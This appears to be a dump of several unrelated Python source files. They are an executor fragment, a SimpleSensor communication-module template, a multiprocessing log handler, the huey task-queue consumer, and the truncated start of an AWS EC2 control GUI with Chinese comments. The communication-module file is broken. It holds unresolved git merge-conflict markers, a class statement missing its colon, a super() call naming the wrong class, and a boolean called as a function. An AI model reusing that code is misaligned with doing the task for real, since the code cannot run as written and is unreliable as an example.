logging.debug("Exiting thread")
self.worker.join()
return True
def submit(self, func, *args, **kwargs):
"""Submits work to the the outgoing_q.
The outgoing_q is an external process listens on this
queue for new work. This method is simply pass through and behaves like a
submit call as described here `Python docs: <https://docs.python.org/3/library/concurrent.futures.html#concurrent.futures.ThreadPoolExecutor>`_
Args:
- func (callable) : Callable function
- *args (list) : List of arbitrary positional arguments.
Kwargs:
- **kwargs (dict) : A dictionary of arbitrary keyword args for func.
Returns:
Future
"""
task_id = uuid.uuid4()
logger.debug("Pushing function {} to queue with args {}".format(func, args))
self.tasks[task_id] = Future()
fn_buf = pack_apply_message(func, args, kwargs,
buffer_threshold=1024 * 1024,
item_threshold=1024)
msg = {"task_id": task_id,
"buffer": fn_buf}
# Post task to the the outgoing queue
self.outgoing_q.put(msg)
# Return the future
return self.tasks[task_id]
@property
def scaling_enabled(self):
return self._scaling_enabled
def scale_out(self, blocks=1):
"""Scales out the number of active workers by 1.
This method is not implemented for threads and will raise the error if called.
This would be nice to have, and can be done
Raises:
NotImplementedError
"""
raise NotImplementedError
def scale_in(self, blocks):
"""Scale in the number of active blocks by specified amount.
This method is not implemented for turbine and will raise an error if called.
Raises:
NotImplementedError
"""
raise NotImplementedError
if __name__ == "__main__":
print("Start")
turb_x = TurbineExecutor()
print("Done")
|
communicationModule.py
|
"""
Sample structure for a communication point module.
This module describes the basic uses of SimpleSensor.
To make your own module, this is a good place to start.
This module will receive large_number events and log/count them,
once the threshold is reached as set in config/module.conf, shutdown.
"""
# Standard imports, usually used by all communication modules
from simplesensor.collection_modules.collection_base import moduleConfigLoader as configLoader
from simplesensor.shared import ThreadsafeLogger, Message, ModuleProcess
from threading import Thread
<<<<<<< HEAD:communication_modules/communication_base/communicationModule.py
=======
# Module specific imports
import random
>>>>>>> collection_base:collection_modules/collection_base/collectionModule.py
class CommunicationModule(ModuleProcess)
# You can keep these parameters the same, all modules receive the same params
# self - reference to self
# baseConfig - configuration settings defined in /simplesensor/config/base.conf
# (https://github.com/AdobeAtAdobe/SimpleSensor/blob/master/config/base.conf)
# pInBoundQueue - messages from handler to this module
# pOutBoundQueue - messages from this module to other modules
# loggingQueue - logging messages for threadsafe logger
def __init__(self, baseConfig, pInBoundQueue, pOutBoundQueue, loggingQueue):
"""
Initialize new CollectionModule instance.
"""
super(CollectionModule, self).__init__()
# Most collection modules will follow a similar pattern...
# 1. Set up some variables on the self object
self.outQueue = pOutBoundQueue
self.inQueue= pInBoundQueue
self.loggingQueue = loggingQueue
self.threadProcessQueue = None
<<<<<<< HEAD:communication_modules/communication_base/communicationModule.py
self.counter = 0
=======
>>>>>>> collection_base:collection_modules/collection_base/collectionModule.py
self.alive = False
# 2. Load the module's configuration file
# Configs
self.moduleConfig = configLoader.load(self.loggingQueue, __name__)
self.config = baseConfig
# 3. Set some constants to the self object from config parameters (if you want)
self._bigNumberThreshold = self.moduleConfig['BigNumberThreshold']
# 4. Create a threadsafe logger object
self.logger = ThreadsafeLogger(loggingQueue, __name__)
def run(self):
"""
Main process method, run when the thread's start() function is called.
Starts monitoring inbound messages to this module.
Usually, any messages going out from communication modules to other
modules will depend on incoming messages.
Typically, a communication module would handle outgoing messages to
connected clients over some protocol, but this is a toy example.
"""
<<<<<<< HEAD:communication_modules/communication_base/communicationModule.py
# Begin monitoring inbound queue
self.listen()
def listen(self):
self.threadProcessQueue = Thread(target=self.processQueue)
self.threadProcessQueue.setDaemon(True)
self.threadProcessQueue.start()
self.alive = True
=======
# Monitor inbound queue on own thread
self.listen()
# For this example, it randomly generates numbers
# if the number is large, send a `large_number` event
# with the number as a parameter in the extendedData
while self.alive:
anum = random.randint(1, 100000)
if anum > 95000:
extraData = {}
extraData['the_number'] = anum
self.putMessage(
'large_number',
extraData
)
def listen(self):
"""
Start thread to monitor inbound messages, declare module alive.
"""
self.threadProcessQueue = Thread(target=self.processQueue)
self.threadProcessQueue.setDaemon(True)
self.threadProcessQueue.start()
self.alive()
def putMessage(self, topic, extendedData=None, recipients=['all'], localOnly=False):
"""
Create an outgoing event object and
put it onto the outgoing queue.
Must at least provide message topic,
rest of the params are optional.
"""
msg = CollectionPointEvent(
self._id,
self._type,
topic,
extendedData=extendedData,
localOnly=localOnly,
recipients=recipients,
eventTime=datetime.datetime.utcnow()
)
self.outQueue.put(msg)
>>>>>>> collection_base:collection_modules/collection_base/collectionModule.py
def processQueue(self):
"""
Process inbound messages on separate thread.
When a message is encountered, trigger an event to handle it.
Sleep for some small amount of time to avoid overloading.
Also receives a SHUTDOWN message from the main process when
the user presses the esc key.
"""
self.logger.info("Starting to watch collection point inbound message queue")
while self.alive:
if (self.inQueue.empty() == False):
self.logger.info("Queue size is %s" % self.inQueue.qsize())
try:
message = self.inQueue.get(block=False,timeout=1)
if message is not None:
if (message.topic.upper()=="SHUTDOWN" and
message.sender_id.lower()=='main'):
self.logger.info("SHUTDOWN command received on %s" % __name__)
self.shutdown()
else:
self.handleMessage(message)
except Exception as e:
self.logger.error("Error, unable to read queue: %s " %e)
self.shutdown()
self.logger.info("Queue size is %s after" % self.inQueue.qsize())
else:
time.sleep(.25)
def handleMessage(self, message):
"""
Handle messages from other modules to this one.
Switch on the message topic, do something with the data fields.
"""
# Parameter checking, data cleaning goes here
try:
assert message.topic is not None
assert message.extended_data is not None
assert message.extended_data.the_number is not None
except:
self.logger.error('Error, invalid message: %s'%message)
if message.topic == 'large_number':
self.logger.info('Module %s encountered a large number: %s'%(message._sender, message._extendedData.the_number))
self.counter += 1
if self.counter > self._bigNumberThreshold:
self.shutdown()
def shutdown(self):
"""
Shutdown the communication module.
Set alive flag to false so it stops looping.
Wait for things to die, then exit.
"""
self.alive = False
self.logger.info("Shutting down")
# Do any extra clean up here
# for example, joining threads if you spawn more
time.sleep(1)
self.exit = True
|
logger_threads.py
|
import sys
import logging
import traceback
import threading
import multiprocessing
from datetime import time, datetime
from logging import FileHandler as FH
from time import sleep
# ============================================================================
# Define Log Handler
# ============================================================================
class CustomLogHandler(logging.Handler):
"""multiprocessing log handler
This handler makes it possible for several processes
to log to the same file by using a queue.
"""
def __init__(self, fname):
super(CustomLogHandler, self).__init__()
self._handler = FH(fname)
self.queue = multiprocessing.Queue()
thrd = threading.Thread(target=self.receive)
thrd.daemon = True
thrd.name = 'Logging Thread'
thrd.start()
def setFormatter(self, fmt):
logging.Handler.setFormatter(self, fmt)
self._handler.setFormatter(fmt)
def receive(self):
while True:
try:
record = self.queue.get()
self._handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
def send(self,s):
self.queue.put_nowait(s)
def _format_record(self, record):
times=datetime.fromtimestamp(record.created)
level=record.levelname
record.msg='{} LOGLEVEL:{} MESSAGE:{}'.format(str(times),level,record.msg)
return record
def emit(self, record):
try:
self.send(self._format_record(record))
except (KeyboardInterrupt, SystemExit) as e:
raise e
except Exception:
self.handleError(record)
def close(self):
self._handler.close()
logging.Handler.close(self)
|
consumer.py
|
import datetime
import logging
import os
import signal
import sys
import threading
import time
from multiprocessing import Event as ProcessEvent
from multiprocessing import Process
try:
import gevent
from gevent import Greenlet
from gevent.event import Event as GreenEvent
except ImportError:
Greenlet = GreenEvent = None
from huey.constants import WORKER_GREENLET
from huey.constants import WORKER_PROCESS
from huey.constants import WORKER_THREAD
from huey.constants import WORKER_TYPES
from huey.exceptions import CancelExecution
from huey.exceptions import ConfigurationError
from huey.exceptions import DataStoreGetException
from huey.exceptions import QueueException
from huey.exceptions import QueueReadException
from huey.exceptions import DataStorePutException
from huey.exceptions import QueueWriteException
from huey.exceptions import RetryTask
from huey.exceptions import ScheduleAddException
from huey.exceptions import ScheduleReadException
from huey.exceptions import TaskLockedException
EVENT_CHECKING_PERIODIC = 'checking-periodic'
EVENT_ERROR_DEQUEUEING = 'error-dequeueing'
EVENT_ERROR_ENQUEUEING = 'error-enqueueing'
EVENT_ERROR_INTERNAL = 'error-internal'
EVENT_ERROR_SCHEDULING = 'error-scheduling'
EVENT_ERROR_STORING_RESULT = 'error-storing-result'
EVENT_ERROR_TASK = 'error-task'
EVENT_LOCKED = 'locked'
EVENT_FINISHED = 'finished'
EVENT_RETRYING = 'retrying'
EVENT_REVOKED = 'revoked'
EVENT_SCHEDULED = 'scheduled'
EVENT_SCHEDULING_PERIODIC = 'scheduling-periodic'
EVENT_STARTED = 'started'
EVENT_TIMEOUT = 'timeout'
def to_timestamp(dt):
if dt:
return time.mktime(dt.timetuple())
class BaseProcess(object):
"""
Abstract process run by the consumer. Provides convenience methods for
things like sleeping for a given amount of time and enqueueing tasks.
Subclasses should implement the `loop()` method, which is called repeatedly
until the consumer is shutdown. The `loop()` method's return value is
ignored, but an unhandled exception will lead to the process shutting down.
A typical pattern might be::
class CustomProcess(BaseProcess):
def loop(self, now=None):
# Get the current timestamp.
current_ts = time.time()
# Perform some action, which may take an arbitrary amount of
# time.
do_some_action()
# Sleep for 60 seconds, with respect to current_ts, so that
# the whole loop() method repeats every ~60s.
self.sleep_for_interval(current_ts, 60)
You will want to ensure that the consumer starts your custom process::
class MyConsumer(Consumer):
def start(self):
# Initialize workers, scheduler, signal handlers, etc.
super(MyConsumer, self).start()
# Create custom process and start it.
custom_impl = CustomProcess(huey=self.huey, utc=self.utc)
self._custom_proc = self._create_process(custom_impl, 'Custom')
self._custom_proc.start()
See also: Consumer._create_process().
"""
def __init__(self, huey, utc):
self.huey = huey
self.utc = utc
def initialize(self):
pass
def get_now(self):
if self.utc:
return datetime.datetime.utcnow()
return datetime.datetime.now()
def get_utcnow(self):
return datetime.datetime.utcnow()
def get_timestamp(self):
return time.mktime(self.get_utcnow().timetuple())
def sleep_for_interval(self, start_ts, nseconds):
"""
Sleep for a given interval with respect to the start timestamp.
So, if the start timestamp is 1337 and nseconds is 10, the method will
actually sleep for nseconds - (current_timestamp - start_timestamp). So
if the current timestamp is 1340, we'll only sleep for 7 seconds (the
goal being to sleep until 1347, or 1337 + 10).
"""
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time <= 0:
return
self._logger.debug('Sleeping for %s', sleep_time)
# Recompute time to sleep to improve accuracy in case the process was
# pre-empted by the kernel while logging.
sleep_time = nseconds - (time.time() - start_ts)
if sleep_time > 0:
time.sleep(sleep_time)
def enqueue(self, task):
"""
Convenience method for enqueueing a task.
"""
try:
self.huey.enqueue(task)
except QueueWriteException:
self.huey.emit_task(EVENT_ERROR_ENQUEUEING, task, error=True)
self._logger.exception('Error enqueueing task: %s', task)
else:
self._logger.debug('Enqueued task: %s', task)
def loop(self, now=None):
"""
Process-specific implementation. Called repeatedly for as long as the
consumer is running. The `now` parameter is currently only used in the
unit-tests (to avoid monkey-patching datetime / time). Return value is
ignored, but an unhandled exception will lead to the process exiting.
"""
raise NotImplementedError
class Worker(BaseProcess):
"""
Worker implementation.
Will pull tasks from the queue, executing them or adding them to the
schedule if they are set to run in the future.
"""
def __init__(self, huey, default_delay, max_delay, backoff, utc):
self.delay = self.default_delay = default_delay
self.max_delay = max_delay
self.backoff = backoff
self._logger = logging.getLogger('huey.consumer.Worker')
self._pre_execute = huey.pre_execute_hooks.items()
self._post_execute = huey.post_execute_hooks.items()
super(Worker, self).__init__(huey, utc)
def initialize(self):
for name, startup_hook in self.huey.startup_hooks.items():
self._logger.debug('calling startup hook "%s"', name)
try:
startup_hook()
except Exception as exc:
self._logger.exception('startup hook "%s" failed', name)
def loop(self, now=None):
task = None
exc_raised = True
try:
task = self.huey.dequeue()
except QueueReadException:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Error reading from queue')
except QueueException:
self.huey.emit_status(EVENT_ERROR_INTERNAL, error=True)
self._logger.exception('Queue exception')
except KeyboardInterrupt:
raise
except:
self.huey.emit_status(EVENT_ERROR_DEQUEUEING, error=True)
self._logger.exception('Unknown exception dequeueing task.')
else:
exc_raised = False
if task:
self.delay = self.default_delay
self.handle_task(task, now or self.get_now())
elif exc_raised or not self.huey.blocking:
self.sleep()
def sleep(self):
if self.delay > self.max_delay:
self.delay = self.max_delay
self._logger.debug('No messages, sleeping for: %s', self.delay)
time.sleep(self.delay)
self.delay *= self.backoff
def handle_task(self, task, ts):
"""
Handle a task that was just read from the queue. There are three
possible outcomes:
1. Task is scheduled for the future, add to the schedule.
2. Task is ready to run, but has been revoked. Discard.
3. Task is ready to run and not revoked. Execute task.
"""
if not self.huey.ready_to_run(task, ts):
self.add_schedule(task)
elif not self.is_revoked(task, ts):
self.process_task(task, ts)
else:
self.huey.emit_task(
EVENT_REVOKED,
task,
timestamp=to_timestamp(ts))
self._logger.debug('Task %s was revoked, not running', task)
def process_task(self, task, ts):
"""
Execute a task and (optionally) store the return value in result store.
Unhandled exceptions are caught and logged.
"""
self.huey.emit_task(EVENT_STARTED, task, timestamp=to_timestamp(ts))
if self._pre_execute:
try:
self.run_pre_execute_hooks(task)
except CancelExecution:
return
self._logger.info('Executing %s', task)
start = time.time()
exception = None
task_value = None
try:
try:
task_value = self.huey.execute(task)
finally:
duration = time.time() - start
except DataStorePutException:
self._logger.exception('Error storing result')
self.huey.emit_task(
EVENT_ERROR_STORING_RESULT,
task,
error=True,
duration=duration)
except TaskLockedException as exc:
self._logger.warning('Task %s could not run, unable to obtain '
'lock.', task.task_id)
self.huey.emit_task(
EVENT_LOCKED,
task,
error=False,
duration=duration)
exception = exc
except RetryTask:
if not task.retries:
self._logger.error('Cannot retry task %s - no retries '
'remaining.', task.task_id)
exception = True
except KeyboardInterrupt:
self._logger.info('Received exit signal, task %s did not finish.',
task.task_id)
return
except Exception as exc:
self._logger.exception('Unhandled exception in worker thread')
self.huey.emit_task(
EVENT_ERROR_TASK,
task,
error=True,
duration=duration)
exception = exc
else:
self._logger.info('Executed %s in %0.3fs', task, duration)
self.huey.emit_task(
EVENT_FINISHED,
task,
duration=duration,
timestamp=self.get_timestamp())
if self._post_execute:
self.run_post_execute_hooks(task, task_value, exception)
if exception is not None and task.retries:
self.requeue_task(task, self.get_now())
def run_pre_execute_hooks(self, task):
self._logger.info('Running pre-execute hooks for %s', task)
for name, callback in self._pre_execute:
self._logger.debug('Executing %s pre-execute hook.', name)
try:
callback(task)
except CancelExecution:
self._logger.info('Execution of %s cancelled by %s.', task,
name)
raise
except Exception:
self._logger.exception('Unhandled exception calling pre-'
'execute hook %s for %s.', name, task)
def run_post_execute_hooks(self, task, task_value, exception):
self._logger.info('Running post-execute hooks for %s', task)
for name, callback in self._post_execute:
self._logger.debug('Executing %s post-execute hook.', name)
try:
callback(task, task_value, exception)
except Exception as exc:
self._logger.exception('Unhandled exception calling post-'
'execute hook %s for %s.', name, task)
def requeue_task(self, task, ts):
task.retries -= 1
self.huey.emit_task(EVENT_RETRYING, task)
self._logger.info('Re-enqueueing task %s, %s tries left',
task.task_id, task.retries)
if task.retry_delay:
delay = datetime.timedelta(seconds=task.retry_delay)
task.execute_time = ts + delay
self.add_schedule(task)
else:
self.enqueue(task)
def add_schedule(self, task):
self._logger.info('Adding %s to schedule', task)
try:
self.huey.add_schedule(task)
except ScheduleAddException:
self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.error('Error adding task to schedule: %s', task)
else:
self.huey.emit_task(EVENT_SCHEDULED, task)
def is_revoked(self, task, ts):
try:
if self.huey.is_revoked(task, ts, peek=False):
return True
return False
except DataStoreGetException:
self.huey.emit_task(EVENT_ERROR_INTERNAL, task, error=True)
self._logger.error('Error checking if task is revoked: %s', task)
return True
class Scheduler(BaseProcess):
"""
Scheduler handles enqueueing tasks when they are scheduled to execute. Note
that the scheduler does not actually execute any tasks, but simply enqueues
them so that they can be picked up by the worker processes.
If periodic tasks are enabled, the scheduler will wake up every 60 seconds
to enqueue any periodic tasks that should be run.
"""
def __init__(self, huey, interval, utc, periodic):
super(Scheduler, self).__init__(huey, utc)
self.interval = min(interval, 60)
self.periodic = periodic
if periodic:
# Determine the periodic task interval.
self._counter = 0
self._q, self._r = divmod(60, self.interval)
self._cr = self._r
self._logger = logging.getLogger('huey.consumer.Scheduler')
self._next_loop = time.time()
def loop(self, now=None):
current = self._next_loop
self._next_loop += self.interval
if self._next_loop < time.time():
self._logger.info('scheduler skipping iteration to avoid race.')
return
try:
task_list = self.huey.read_schedule(now or self.get_now())
except ScheduleReadException:
#self.huey.emit_task(EVENT_ERROR_SCHEDULING, task, error=True)
self._logger.exception('Error reading from task schedule.')
else:
for task in task_list:
self._logger.info('Scheduling %s for execution', task)
self.enqueue(task)
if self.periodic:
# The scheduler has an interesting property of being able to run at
# intervals that are not factors of 60. Suppose we ask our
# scheduler to run every 45 seconds. We still want to schedule
# periodic tasks once per minute, however. So we use a running
# remainder to ensure that no matter what interval the scheduler is
# running at, we still are enqueueing tasks once per minute at the
# same time.
if self._counter >= self._q:
self._counter = 0
if self._cr:
self.sleep_for_interval(current, self._cr)
if self._r:
self._cr += self._r
if self._cr >= self.interval:
self._cr -= self.interval
self._counter -= 1
self.enqueue_periodic_tasks(now or self.get_now(), current)
self._counter += 1
self.sleep_for_interval(current, self.interval)
def enqueue_periodic_tasks(self, now, start):
self.huey.emit_status(
EVENT_CHECKING_PERIODIC,
timestamp=self.get_timestamp())
self._logger.debug('Checking periodic tasks')
for task in self.huey.read_periodic(now):
self.huey.emit_task(
EVENT_SCHEDULING_PERIODIC,
task,
timestamp=self.get_timestamp())
self._logger.info('Scheduling periodic task %s.', task)
self.enqueue(task)
return True
class Environment(object):
"""
Provide a common interface to the supported concurrent environments.
"""
def get_stop_flag(self):
raise NotImplementedError
def create_process(self, runnable, name):
raise NotImplementedError
def is_alive(self, proc):
raise NotImplementedError
class ThreadEnvironment(Environment):
def get_stop_flag(self):
return threading.Event()
def create_process(self, runnable, name):
t = threading.Thread(target=runnable, name=name)
t.daemon = True
return t
def is_alive(self, proc):
return proc.isAlive()
class GreenletEnvironment(Environment):
def get_stop_flag(self):
return GreenEvent()
def create_process(self, runnable, name):
def run_wrapper():
gevent.sleep()
runnable()
gevent.sleep()
return Greenlet(run=run_wrapper)
def is_alive(self, proc):
return not proc.dead
class ProcessEnvironment(Environment):
def get_stop_flag(self):
return ProcessEvent()
def create_process(self, runnable, name):
p = Process(target=runnable, name=name)
p.daemon = True
return p
def is_alive(self, proc):
return proc.is_alive()
WORKER_TO_ENVIRONMENT = {
WORKER_THREAD: ThreadEnvironment,
WORKER_GREENLET: GreenletEnvironment,
'gevent': GreenletEnvironment, # Preserved for backwards-compat.
WORKER_PROCESS: ProcessEnvironment,
}
class Consumer(object):
"""
Consumer sets up and coordinates the execution of the workers and scheduler
and registers signal handlers.
"""
def __init__(self, huey, workers=1, periodic=True, initial_delay=0.1,
backoff=1.15, max_delay=10.0, utc=True, scheduler_interval=1,
worker_type='thread', check_worker_health=True,
health_check_interval=1, flush_locks=False):
self._logger = logging.getLogger('huey.consumer')
if huey.always_eager:
self._logger.warning('Consumer initialized with Huey instance '
'that has "always_eager" mode enabled. This '
'must be disabled before the consumer can '
'be run.')
self.huey = huey
self.workers = workers # Number of workers.
self.periodic = periodic # Enable periodic task scheduler?
self.default_delay = initial_delay # Default queue polling interval.
self.backoff = backoff # Exponential backoff factor when queue empty.
self.max_delay = max_delay # Maximum interval between polling events.
self.utc = utc # Timestamps are considered UTC.
# Ensure that the scheduler runs at an interval between 1 and 60s.
self.scheduler_interval = max(min(scheduler_interval, 60), 1)
self.worker_type = worker_type # What process model are we using?
# Configure health-check and consumer main-loop attributes.
self._stop_flag_timeout = 0.1
self._health_check = check_worker_health
self._health_check_interval = float(health_check_interval)
# Create the execution environment helper.
self.environment = self.get_environment(self.worker_type)
# Create the event used to signal the process should terminate. We'll
# also store a boolean flag to indicate whether we should restart after
# the processes are cleaned up.
self._received_signal = False
self._restart = False
self._graceful = True
self.stop_flag = self.environment.get_stop_flag()
# In the event the consumer was killed while running a task that held
# a lock, this ensures that all locks are flushed before starting.
if flush_locks:
self.flush_locks()
# Create the scheduler process (but don't start it yet).
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
# Create the worker process(es) (also not started yet).
self.worker_threads = []
for i in range(workers):
worker = self._create_worker()
process = self._create_process(worker, 'Worker-%d' % (i + 1))
# The worker threads are stored as [(worker impl, worker_t), ...].
# The worker impl is not currently referenced in any consumer code,
# but it is referenced in the test-suite.
self.worker_threads.append((worker, process))
def flush_locks(self):
self._logger.debug('Flushing locks before starting up.')
flushed = self.huey.flush_locks()
if flushed:
self._logger.warning('Found stale locks: %s' % (
', '.join(key for key in flushed)))
def get_environment(self, worker_type):
if worker_type not in WORKER_TO_ENVIRONMENT:
raise ValueError('worker_type must be one of %s.' %
', '.join(WORKER_TYPES))
return WORKER_TO_ENVIRONMENT[worker_type]()
def _create_worker(self):
return Worker(
huey=self.huey,
default_delay=self.default_delay,
max_delay=self.max_delay,
backoff=self.backoff,
utc=self.utc)
def _create_scheduler(self):
return Scheduler(
huey=self.huey,
interval=self.scheduler_interval,
utc=self.utc,
periodic=self.periodic)
def _create_process(self, process, name):
"""
Repeatedly call the `loop()` method of the given process. Unhandled
exceptions in the `loop()` method will cause the process to terminate.
"""
def _run():
process.initialize()
try:
while not self.stop_flag.is_set():
process.loop()
except KeyboardInterrupt:
pass
except:
self._logger.exception('Process %s died!', name)
return self.environment.create_process(_run, name)
def start(self):
"""
Start all consumer processes and register signal handlers.
"""
if self.huey.always_eager:
raise ConfigurationError(
'Consumer cannot be run with Huey instances where always_eager'
' is enabled. Please check your configuration and ensure that'
' "huey.always_eager = False".')
# Log startup message.
self._logger.info('Huey consumer started with %s %s, PID %s',
self.workers, self.worker_type, os.getpid())
self._logger.info('Scheduler runs every %s second(s).',
self.scheduler_interval)
self._logger.info('Periodic tasks are %s.',
'enabled' if self.periodic else 'disabled')
self._logger.info('UTC is %s.', 'enabled' if self.utc else 'disabled')
self._set_signal_handlers()
msg = ['The following commands are available:']
for command in self.huey.registry._registry:
msg.append('+ %s' % command.replace('queuecmd_', ''))
self._logger.info('\n'.join(msg))
# We'll temporarily ignore SIGINT and SIGHUP (so that it is inherited
# by the child-processes). Once the child processes are created, we
# restore the handler.
original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)
if hasattr(signal, 'SIGHUP'):
original_sighup_handler = signal.signal(signal.SIGHUP, signal.SIG_IGN)
self.scheduler.start()
for _, worker_process in self.worker_threads:
worker_process.start()
signal.signal(signal.SIGINT, original_sigint_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, original_sighup_handler)
def stop(self, graceful=False):
"""
Set the stop-flag.
If `graceful=True`, this method blocks until the workers to finish
executing any tasks they might be currently working on.
"""
self.stop_flag.set()
if graceful:
self._logger.info('Shutting down gracefully...')
try:
for _, worker_process in self.worker_threads:
worker_process.join()
except KeyboardInterrupt:
self._logger.info('Received request to shut down now.')
else:
self._logger.info('All workers have stopped.')
else:
self._logger.info('Shutting down')
def run(self):
"""
Run the consumer.
"""
self.start()
timeout = self._stop_flag_timeout
health_check_ts = time.time()
while True:
try:
self.stop_flag.wait(timeout=timeout)
except KeyboardInterrupt:
self._logger.info('Received SIGINT')
self.stop(graceful=True)
except:
self._logger.exception('Error in consumer.')
self.stop()
else:
if self._received_signal:
self.stop(graceful=self._graceful)
if self.stop_flag.is_set():
break
if self._health_check:
now = time.time()
if now >= health_check_ts + self._health_check_interval:
health_check_ts = now
self.check_worker_health()
if self._restart:
self._logger.info('Consumer will restart.')
python = sys.executable
os.execl(python, python, *sys.argv)
else:
self._logger.info('Consumer exiting.')
def check_worker_health(self):
"""
Check the health of the worker processes. Workers that have died will
be replaced with new workers.
"""
self._logger.debug('Checking worker health.')
workers = []
restart_occurred = False
for i, (worker, worker_t) in enumerate(self.worker_threads):
if not self.environment.is_alive(worker_t):
self._logger.warning('Worker %d died, restarting.', i + 1)
worker = self._create_worker()
worker_t = self._create_process(worker, 'Worker-%d' % (i + 1))
worker_t.start()
restart_occurred = True
workers.append((worker, worker_t))
if restart_occurred:
self.worker_threads = workers
else:
self._logger.debug('Workers are up and running.')
if not self.environment.is_alive(self.scheduler):
self._logger.warning('Scheduler died, restarting.')
scheduler = self._create_scheduler()
self.scheduler = self._create_process(scheduler, 'Scheduler')
self.scheduler.start()
else:
self._logger.debug('Scheduler is up and running.')
return not restart_occurred
def _set_signal_handlers(self):
signal.signal(signal.SIGTERM, self._handle_stop_signal)
signal.signal(signal.SIGINT, signal.default_int_handler)
if hasattr(signal, 'SIGHUP'):
signal.signal(signal.SIGHUP, self._handle_restart_signal)
def _handle_stop_signal(self, sig_num, frame):
self._logger.info('Received SIGTERM')
self._received_signal = True
self._restart = False
self._graceful = False
def _handle_restart_signal(self, sig_num, frame):
self._logger.info('Received SIGHUP, will restart')
self._received_signal = True
self._restart = True
|
Miranda_Ubuntu_aws_sshrdp_UIv7.py
|
# --- The MIT License (MIT) Copyright (c) Sat May 3 02:14:00am 2020 ---
# 此程的功能為提供使用 Amazon Web Service (AWS) 的 EC2 服務的使用者一個簡便的使用者界面
# 能夠將每台EC2 Instance(虛擬機器)用Instance ID做成設定檔在使用時可以快速方便地開或/關機
# 方法是在%userprofile%\.aws\目錄建立一個客製的文字檔其副檔名為.aws, 例如 username1.aws
# 同時也用AWS CLI執行AWS Configure以建立%userprofile%\.aws\credentials提供程式存取權限
# --- English Version ---
# The program is intended to provide users who are using EC2 service in AWS (
# Amazon Web Service) to instantly interact with the EC2 instances with a GUI (
# graphical user interface) by instance IDs in a pre-configured text-formatted file.
# To run the program, the AWS credentail should be configured by running AWS CLI.
# With that, a %userprofile%\.aws\credentials file will be created. Additionaly,
# you create each of the EC2 instances you have with a profile in %userprofile%\.aws
# folder by setting their credential profile name, instance ID, region and password.
from tkinter import Tk, LabelFrame, Label, Entry, Button, StringVar
import sys, os, logging, json, threading
import boto3
# === 設定程式日誌輸出的等級 ===
logging.basicConfig(level=logging.WARNING, format = '%(levelname)s: %(message)s')
#logging.basicConfig(level=logging.INFO, format = '%(levelname)s: %(message)s')
#logging.basicConfig(level=logging.DEBUG, format = '%(levelname)s: %(message)s')
# === 取得 aws 帳號密碼副程式 ==========
def get_awsconfig():
configFiles = [ i for i in os.listdir(os.path.expanduser(r'~/.aws/')) if i.lower().endswith('.aws') ]
if len(configFiles) == 1:
selectedConfigIndex = 0 # 預設為第 1 個 config profile
elif len(configFiles) > 1:
while True:
selectedConfig = input(configFiles)
if not selectedConfig:
selectedConfigIndex = 0
break
elif selectedConfig.isdigit():
selectedConfigIndex = int(selectedConfig)
if selectedConfigIndex < len(configFiles):
break
else:
logging.warning(r'你選擇的設定檔號碼 [%s] 超出能選擇的範圖.' % str(selectedConfig))
else:
logging.warning(r'你選擇的設定檔號碼 [%s] 超出能選擇的範圖.' % str(selectedConfig))
else:
logging.warning(r'無法找到你的 aws 使用者帳號與密碼的設定檔 %userprofile%/.aws/*.aws !')
# === ** 如果使用 ssh 連線, 設定檔裡的 "Password" 需設定 .pem 的檔案位置, 例如 (* 注意, 使用 ssh 時 Password 為 .pem 的檔案位置)
logging.warning(r'設定檔格式 ssh 為: {"Profile":"profile username", "Region":"ap-east-2", "ID":"i-01abc234defg5h6j7", "Password":"C://Users//username//.awscredentials//UbuntuServer1804LTSami-5ad2972b.pem"}')
# === ** 如果使用 rdp 連線, 設定檔裡的 "Password" 需則在 aws console 裡使用 .pem 將密碼解密為明碼後寫在設定檔裡
logging.warning(r'設定檔格式 rdp 為:{"Profile":"profile username", "Region":"ap-east-2", "ID":"i-01abc234defg5h6j7", "Password":"@?b!)axcyNKi1SqICn9oSygPx8k(Zm1e"}')
return None
try:
configFile = configFiles[selectedConfigIndex] # 設定為選定的 config profile
except Exception:
logging.warning(r'你設定的 aws 使用者帳號與密碼的設定檔: %s 無法使用.' % configFile)
return None
try:
with open(os.path.expanduser(r'~/.aws/%s' % configFile), 'r', encoding='utf-8') as f:
awsprofile = json.load(f)
except Exception:
logging.warning(r'你設定的 aws 使用者帳號與密碼的設定檔: %s 無法使用' % configFile)
return None
if awsprofile['Password'].lower().endswith('.pem'):
if not os.path.isfile(awsprofile['Password']):
logging.warning(r'無法找到你在設定檔裡指定的 aws 伺服器 .pem 金鑰檔: %s' % awsprofile['Password'])
return None
awsprofile['configFile'] = configFile.rstrip('.aws') # 把選定的設定檔也做為參數的一部份傳回
return awsprofile
# === 啟始 aws ec2Instance 物件 ==========
class ec2Instance:
def __init__(self, accountProfile):
self.profileName = accountProfile['Profile']
self.userRegion = accountProfile['Region']
self.instanceID = accountProfile['ID']
self.accountPwd = accountProfile['Password']
self.configFile = accountProfile['configFile']
try:
self.session = boto3.Session(profile_name = self.profileName)
except Exception:
logging.warning(r'無法找到你的 aws credentials 設定檔. 可能需要安裝 aws cli 並執行 aws configure. 這樣才會產生 credentials 文件.')
self.client = None
else:
logging.debug(r'已找到你的 aws credentials 設定檔並用來啟始 ec2 Instance 物件.')
self.client = self.session.client('ec2', region_name = self.userRegion)
# === 開關機狀態及其他參數 ===
def getStastictics(self):
self.fqdn = '' # ' - 尚未開機 - '
self.ip = '' # ' - 尚未開機 - '
self.instancedescription = self.client.describe_instances(InstanceIds = [self.instanceID,])
self.status = self.instancedescription['Reservations'][0]['Instances'][0]['State']['Name']
if self.status == 'running':
self.fqdn = self.instancedescription['Reservations'][0]['Instances'][0]['NetworkInterfaces'][0]['Association']['PublicDnsName']
self.ip = self.instancedescription['Reservations'][0]['Instances'][0]['NetworkInterfaces'][0]['Association']['PublicIp']
# === 開機 ===
def setRunning(self):
if self.status == 'stopped':
apiResponse = self.client.start_instances(InstanceIds = [self.instanceID,])
if apiResponse['ResponseMetadata']['HTTPStatusCode'] != 200:
